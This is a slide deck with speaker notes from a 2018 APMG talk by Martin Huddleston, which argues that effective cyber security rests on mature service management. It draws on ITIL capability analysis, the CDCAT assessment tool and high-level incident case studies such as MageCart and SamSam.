Martin Huddleston: No Service Management, No Security
- 1. 1
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
apmg-international.com
CYBER SECURITY
No Service Management,
No Cyber Security
20th November 2018
Martin Huddleston, Head of Cyber
CDCAT® is the registered trade mark of The Secretary of State for Defence, Dstl
- 2. 2
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
What we will cover
• The Service Management Risk Balance
• The Threat
• What Good Cyber Security Looks Like
• Analytics – Cyber Security through the Service Management Lens
• Real world Case Studies of High Frequency Use Process in Threat Prevention
• A Tangled Web
• What it means to be ‘Effective’, meeting appetite to take risk
• Digital Services Growth – Service Management Futures
• Takeaways
- 3. 3
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Service Management Reminder – Risk Balance
This Photo by Unknown Author is licensed under CC BY-ND
•Resources
•Quality /
Performance
(including
cyber
security)
•Stakeholder
interests
- 4. 4
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Threat Actor Motivations, Means and Agility
Financial Fraud / Extortion
Resource Acquisition
Competitive IPTheft
Reputational Damage
Blackmail
State SponsoredAttacks
Social engineered attacks on the person / groups
Speed and agility in opportunities of the moment
Supply chain, 3rd party code and API security
Resource acquisition and parasitic processes
- 5. 5
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Modern Day Dog-Fight – Attacker Lifecycle Elements
• Privilege Escalation
• Opportunity Identification
• Attacker DevSecOps
• Reconnaissance
• Initial Access
• Execution
• Persistence
• Defence Evasion
• Credential Access
• Discovery
• Lateral Movement
• Collection
• Exfiltration
• Command and Control
• Attack Assurance
This Photo by Unknown Author is licensed under CC BY-NC-ND
- 6. 6
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
• Service Management Integrated
Standard(s) & Frameworks
• Proportionate Performance to Impacts,
Agile to Context and Appetite to Take
Risk
• Per Asset and per Threat Performance
• Cyber Value and Effectiveness
Measurable
So What Does Good Cyber Security Look Like?
- 7. 7
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Good Cyber Security – 2009 ‘Confiker’ Impact
• UK MoD needed means to assess systems cyber defence preparedness
• MoDChief ScientificAdvisor asked Dstl to establish “What good looks like”
• Dstl could not find a suitable commercial product
• MOD / Dstl developed know - how to enable it to:-
Systematically collect evidence
Make evidence based investment decisions
Do this at pace and scale
CDCAT® is the registered trademark of The Secretary of State for Defence.
© Crown copyright, 2015; Crown Database Rights, 2015
- 8. 8
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
• Operational Resilience
• 2 Lifecycles in Risk Balance
Cyber Defence
Service Management
• Multi-standard Support
159 Capabilities, NATO*/MOD Derived
Protect / Defend / Operate satisfaction of
ALL included standards
Integrated Control System for Cyber Security
- 9. 9
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Modern Day Dog-Fight – Defender Lifecycles / Phases
* Compared to US NIST Cyber Security Framework – Identify, Protect, Detect, Respond Recover
“Security is not merely a ‘state’ but a process that consists of 3 fundamental
components: Protection, Detection and Reaction”
-Bob Ayes, US DoD, 1998
• Strategy
• Design
• Transition
Incl. DevSecOps
• Operation
• Continual Improvement
• Assess*
• Deter
• Protect
• Detect
• Respond
• Recover
This Photo by Unknown Author is licensed under CC BY-NC-ND
- 11. 11
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
10 Steps to Cyber Security – Capability Count
0
5
10
15
20
25
30
35
1 11 21 31 41 51 61 71 81 91 101
CapabilityRe-useCount
Capability Order (by a rank)
10 Steps to Cyber Security
0
5
10
15
20
25
30
35
1 11 21 31 41 51 61 71 81 91 101
CapabilityRe-useCount
Capability Order (by frequency rank)
10 Steps – Excl. ITIL®V3
Top Four Gaps:
1) Incident Management
2) Risk Management
3) Supplier Management
4) Service Asset & Configuration Management
Top Four:
1) Define Security Configuration Baselines
2) Establish Policies to Secure Target System
3) Establish Policies to Secure Information
4) Identify Minimum System Security Requirements
- 12. 12
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
US NIST Cyber Security Framework – Capability Count
0
10
20
30
40
50
60
70
1 11 21 31 41 51 61 71 81 91 101 111 121 131
CapabilityRe-useCount
Capability Order (by frequency rank)
NIST CSF V1.1
0
10
20
30
40
50
60
70
1 11 21 31 41 51 61 71 81 91 101 111 121 131
CapabilityRe-useCount
Capability Order (by frequency rank)
NIST CSF V1.1 excl. ITIL V3
Top Four:
1) Information Security
2) Health Checks / Audits
3) Secure Data and Network Management
4) Accounting and Audit Controls
Top Four Gaps:
1) Information Security
2) Incident Management
3) Supplier Management
4) Risk Management
- 13. 13
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Poll of Top Service Management Capabilities - Impact
MageCart Indidents
Ticketmaster, British Airways et al.
Supplier Management
Top ITIL® Capabilities
Service Asset & Configuration
Management
Incident Management
Risk Management
- 14. 14
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Facebook Incident
“This attack exploited the complex
interaction of multiple issues in our
code. It stemmed from a change
we made to our video uploading
feature in July 2017…hackers
were using the site's API to
automate the process of grabbing
users' profile information”
Supplier Management
Top ITIL® Capabilities
Service Asset & Configuration
Management
Incident Management
Risk Management
Poll of Top Service Management Capabilities - Impact
- 15. 15
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Supplier Management
Top ITIL® Capabilities
Service Asset & Configuration
Management
Incident Management
Risk Management
SamSam Incidents –
Healthcare Sector
“Modus operandi is to gain access
to an organization’s network,
spend time performing
reconnaissance by mapping out
the network, before encrypting as
many computers as possible and
presenting the organization with a
single ransom demand”
Poll of Top Service Management Capabilities - Impact
- 16. 16
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Service Management in Complex System Risk –
“A Tangled Web”
• Change language to Cyber Defence, not passive cyber security, but proactive
defence.
• Increasing dependencies is a growing risk
With every new cyber security standards, we are seeing greater complexity
• A future is with us now
AI’s essential impact on service management, the complexity & scale issue
• But not all good. A new class of problems and a new Service Management:
Prevent: keeping down the AI weeds from choking the internet and digital
services
Detect: for cyber ‘bad’ actors from weaponizing the AI weeds
Recover/Respond: cleaning up the AI weeds.
- 17. 17
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Continual Improvement - Operational Risk Measurement e.g.
Supply / Service Chain Security Effectiveness
These assets are individual systems / services
that have had cyber defence assessment and
effectiveness measurement calibrated to real-
world performance data
These allow you to decide a risk appetite and
actions to accept, treat, transfer or avoid the
risk as a portfolio
Overall Effectiveness with
Maturity Levels
- 18. 18
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Control System Trends in Digital Services Growth
Leading to a changing face for Operational Resilience and Management of Harm
Process Quality
Only Compliance
Driven
Passive
BC & DR
Response &
Recovery Driven
Reactive
Intelligence,
Analytics &
Agility Driven
Proactive
Self Healing, re-
Provisioning,
After-care
AutonomicAdhoc
- 19. 19
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
Takeaways
1. Service Managers can “step up” to secure networks, effective security is a ‘team’ sport -
consider your high frequency processes first
2. The need for more operational testing, SIAM*, DevSecOps and of complex systems is
inevitable - consider your ‘Release and Deployment’ processes
3. Baseline your current maturity effectiveness to empower your business conversations in
valuing cyber risk - quantify it with the business exposure
*SIAM – Service Integration and Management
- 21. 21
apmg-international.com
© Copyright APMG Group 2018, All Rights Reserved
+44 (0) 1494 452450
servicedesk@apmgroupltd.com
linkedin.com/company/apm-group
apmg-international.com
@Cyber_APMG @APMG_Inter
facebook.com/APMGinternationalLTD
Keeping in touch
© APMG International Ltd. 2018. All rights reserved.
Editor's Notes
- No service management No cyber security
Cyber Security is no different from any other management activity, the theory is straight forward and well known, execution is very difficult. Research carried out by a joint UK/US team identified that one key element of high quality Cyber security is world class service management as the majority of controls used to secure a system lie within the Service management realm. Martin will outline the background to the research and share the results that identify how service management controls fit within a Cyber security life cycle. Building on this work Martin will show how we need to think more about effectiveness and continuous improvement rather than compliance to give us the best chance of staying ahead of the attackers.
Plan
Assume people know what service management is (3 legged stool), what is cyber security re operational resilience maturity to agile defence agile operations resource prioritisation agility, raising process and performance maturity to be able to be agile to be able to perform.
What makes cyber security execution difficult? [Threat agility, attack right once, defence right every time] [ Failure of protection, resort to Resilience/recovery][Evolution of systems / defences]
NATO / MOD background, maturity models for agility.
What is high quality Cyber Security and what role is Service Management playing – heat map/statistics/re-use.
Demonstrate how service management controls fit in the CyberSecurity Lifecycle. [iData CPNI/NCSC kill chain, ATT&CK steps/lifecycle, A/D/P/D/R/R]
Effectiveness & continual improvement (noting ISO20000-1:2018 has dropped CSI), agility to stay ahead of attackers, DevSecOps [re recent UK/US/Canada Airforce investments in agile process] [ coding securely at pace] [issue for GitHub and ReadHat’s new owners re opensource]
- Service Management Reminder
Threats, Threat Agility
What does good look like in Cyber Security
- Financial Fraud/Extortion, Resource Acquisition, Competitive IP Theft, Reputational Damage, Black-mail, State Sponsored Attacks…
NCSC: Sept Threat brief on Supply Chain . NCSC is developing its approach to this issue and stated in October 2018 that the risk in the supply chain is:-
• An increase in pace and number of cyber security incidents
• No increase in severity
• Vulnerabilities are old and can be patched
• Attacks do not require use of high-end skills
• Supply chain at risk, with suppliers being the first source of the compromise.
NCSC’s approach also recommends:-
• Promoting cloud-based hosting technology for the vast majority of users
• To change the focus from sites to systems
• Exploring models for examining and recording cyber security of common suppliers
• Promoting NIS across all CNI sectors (not just ones regulated by NIS) and major businesses to improve security in the supply chain
• Piloting a new Active Cyber Defence “Supplier Check” inspection of external web site as proxy for internal cyber posture.
Current ‘Live’ Means Used by Attackers
Social engineered attacks on the person
e.g. Phishing, Vishing, Whaling, etc
Speed and agility
e.g. opportunistic ransomware, machine to machine network exploitation – SAMSAM, WannaCry, etc
Supply chain and sources of code and API security
e.g. Ccleaner, MageCart (TicketMaster, BA et al), FaceBook, etc
Resource acquisition in parasitic processes
e.g. DDOS bots, crypto mining, scam hosting
https://duo.com/decipher/magecart-group-refines-attacks-nabs-more-sites
Much of Magecart’s previous attacks focused on compromising third-party providers. The group would inject its malicious code into libraries and scripts provided by third-party providers, thus ensuring that any website using that provider’s code would be executing the attack code. For example, Magecart has targeted websites running outdated and unpatched versions of Magento, an open-source ecommerce platform written in PHP. Recent figures suggest that over 7,300 stores have been affected by the MagentoCore card skimming code.
- Unseen, performing, cost effective – sounds like service management …Compliance is not Enough, How High the Bar, What Performance and what Effectiveness, What Agility, changing the Bar Anticipating the Threats / Vulnerabilities, Continual Optimisation, ATT&CK / Intel, AutomationCommoditisationCloudUtility SecurityJust a characteristic of Digital Service, a feature of service & service management.
Like any athlete the organisation needs to perform, every time, which is hard, sustaining performance is all about service management, including delivering agile services, where the service is cyber security.
What it is not is conformance to ISO/IEC 27001 or ISO/IEC 20000-1 or any ‘compliance’ standard
It is much more than process in sense of process quality improvement
Sustaining outcomes, Sustaining and Adapting, Optimising to the dynamic, more than People, Process, Technology – sustaining is about TEPIMOIL / Leadership … don’t conflate ‘Governance’ with ‘Performance’ – operational agility is hard, but service management has always sought to deliver
3 legged stool of balancing stakeholders, resources and performance/quality/output – we know there are never enough resources, not just for security, resources and prioritisation are the order of the day
Performance vs compliance, visualise the High Jump, but how high the bar?
- Back ground ‘Time Based Security’ book by Wynn Schwartau on, Bob Ayers Director at DoD Information Systems Security Programme and team at US DOD DISA, Circa 1997: Protection > Detection + Reaction. ‘Risk Avoidance’ cultures are doomed to failure. Security risk cannot be designed out.
- 5 basic cyber controls that everyone should adhere to
Boundary firewalls and internet gateways
Secure configuration
Access control
Malware protection
Patch management
Top 5 Capabilities by Frequency:
Define Security Configuration Baselines
Establish Policies to Secure Target System
Establish Policies to Secure Information
Identify Minimum System Security Requirements
Secure Data and Network Management
Top 6 Capabilities used for ITIL V3 Delivery
Incident Management
Risk Management
Supplier Management
Service Asset & Configuration Management
Cyber Policy
Event Management
-
Top 5 Capabilities by frequency:
Information Security
Health Checks / Audits
Secure Data and Network Management
Accounting and Audit Controls
Incident Management
Top 6 ITIL V3 Capabilities excluded:
Information Security
Incident Management
Supplier Management
Risk Management
Service Continuity Plan
Metrics / Improvement Opportunity Identification
- https://duo.com/decipher/magecart-group-refines-attacks-nabs-more-sites
https://www.zdnet.com/article/british-airways-cyberattack-data-theft-bigger-than-we-first-thought/
10 Steps:
Incident Management
Risk Management
Supplier Management
Service Asset & Configuration Management
Cyber Policy
Event Management
ASD:
Service Asset & Configuration Management 2
Change Management
Event Management
Incident Management 2
Release and Deployment Management
Risk Management 2
NIST:
Information Security
Incident Management 3
Supplier Management 2
Risk Management 3
Service Continuity Plan
Metrics / Improvement Opportunity Identification
Aggregate:
Cyber Policy 2
Information Security 2
Cyber Strategy
Metrics / Improvement Opportunity Identification
Risk Management 4
Access Management
- Change language to Cyber Defence, not passive cyber security, but proactive defence.
Increasing in dependencies is a growing risk
With every new cyber security standards, we are seeing greater complexity/dependencies
Statistics on complexity, re grown in number of mappings per capability, would be a string indicator of the fundamental need for automation in capability interactions.
Could conclude from this why SM and SIAT in particular, remains and will grow in importance.
A future with us now in a tangled Web
AI’s growing and essential impact on service management, the complexity & scale issue
But Not all good, new class of problems
Prevent: keeping down the AI weeds from choking the internet and digital services
Detect: preventing cyber ‘bad’ actors from weaponizing the AI weeds
Recover/Respond: cleaning up the AI weeds.
https://www.weforum.org/reports/the-global-risks-report-2018
A Tangled Web
Artificial intelligence “weeds” proliferate, choking off the performance of the internet
What if the adverse impact of artificial intelligence (AI) involves not a super-intelligence that takes control from humans but “AI weeds”—low-level algorithms that slowly choke off the internet? Algorithms are already proliferating. As they increase in sophistication—as we become more reliant on code that writes code, for example—explosive growth becomes more likely. A divergence could open between the code we have created and our capacity to track and control it.
The tragedy of the commons means we often let chronic problems with dispersed responsibilities fester. Think of plastic in the ocean. A trend towards reduced internet efficiency would undermine service delivery in countless businesses. It could hobble the Internet of Things. It would frustrate users. If the problem became significant enough, it could prompt some governments to wall off parts of the internet. If malicious actors found ways to proliferate or weaponize the AI weeds, they could do extensive damage.
As the global demands placed on the internet increase in scale and sophistication, digital hygiene is likely to become a more pressing concern for end-users. The development of overarching norms, regulations and governance structures for AI will be crucial: without a robust and enforceable regulatory framework, there is a risk that humans will in effect be crowded out from the internet by the proliferation of AI.
Service Management or Cyber Security, or does it matter, just Secure Digital SM?
- Aggregate analysis to assess whether appetite to take risk is being applied uniformly and if systems are connected whether risk is being appropriately managed, e.g. is system M connected to system N, in which case system effectiveness might be that of M not N.
This diagram currently not routinely produced by CDCAT but by subsequent consultancy.
Discuss continual maturity improvement, road to effectiveness is about sustaining high performance to agile attackers to make it hard for them so they try elsewhere. Capability improvement is about knowing where to invest to get the most bang for buck, take for example the 4 ITIL processes identified.
In a world of cloud services, extended API’s down an opaque supply or service chain, where attackers can live off the land of the slightest configuration mismatch exploiting emergent behaviour, then to know the capability maturity and quantify the effectiveness calibrated to an absolute scale is to instil trust and or decide what risk measures are needed from the business perspective. E.g. to take out appropriate cyber insurance but understand insurers rightly place obligations on you to be mature in your resilience operation, a partnership in financial mitigations.
- Reasons to be proactive:
Money
Reputation
Livelihood
Safety
Survival
Explain resilience and stress induced by Cyber, conflict of maturity levels, agile tends to Level 2 ‘Developing’ whilst Cyber Security tends to Level 4 ‘Manage outcomes by metrics’. Future business architectures ‘build this in’ by design but at a cost compensated for by future benefits, i.e. the opportunity. Security and proactive resilience isn’t free. Business evolutions and resilience is evolving to change what is ‘normal’ in business design.
Aim is now to provide a framework and risk analysis system that supports the agility needed
Discuss the status of regulators approach to harm and expectations on managing risk in financial service.
Discuss state of the art in autonomics, e.g. telecoms 5G and zero-touch provisioning, role of service management in carrier grade services delivery including security effectiveness to better than 5x9’s availability. Right almost every time – the means to digitally secure systems in the face of human fallibility and inevitable mis-configurations of complex services.
Influence of 5G autonomic technologies, e.g. zero touch provisioning.
Forensics: premera-blue breach data destruction
https://www.zdnet.com/article/premera-blue-cross-accused-of-destroying-evidence-in-data-breach-lawsuit/ see also SANS NewsBites Vol. 20 Num. 070 : California Establishes Election Cybersecurity Office; Five Eyes Want to Access Encrypted Communications; California Approves Net Neutrality Bill for the commentary. [CDCAT Q2: CDCAT Application: Capabilities folder]. Need in recovery operations to forensically archive data/equipment to ensure legal duties of care.
Automation, cenx/ericsson closed loop control and 5G
cdcat lvl 3,4,5 automated control identification, predicting where it will be needed next re mapping is a process of process design to achieve cyber defence but using IA, CNO and SM.
https://www.fiercetelecom.com/telecom/ericsson-boosts-closed-loop-automation-capabilities-deal-to-buy-cenx cdcat lvl 3,4,5 automated control identification. this is an example where that automation is bubbling up
- Service Managers can and need to “step up” to secure networks, Good cyber security is dependent on good service management, Effective security is a “team sport”, automate for repeatable outcomes, get to grips with configuration risk.
Most breaches are due to insider issues [in fact historical human error and misconfiguration, ref VDBIR] – need for more testing, DevSecOps. Compliance alone means accepting successful attacks
Baseline your current maturity effectiveness and empower you business conversations in the value of cyber risk – quantify it using real world calibration. Maturity of implementation is the only way to effective security.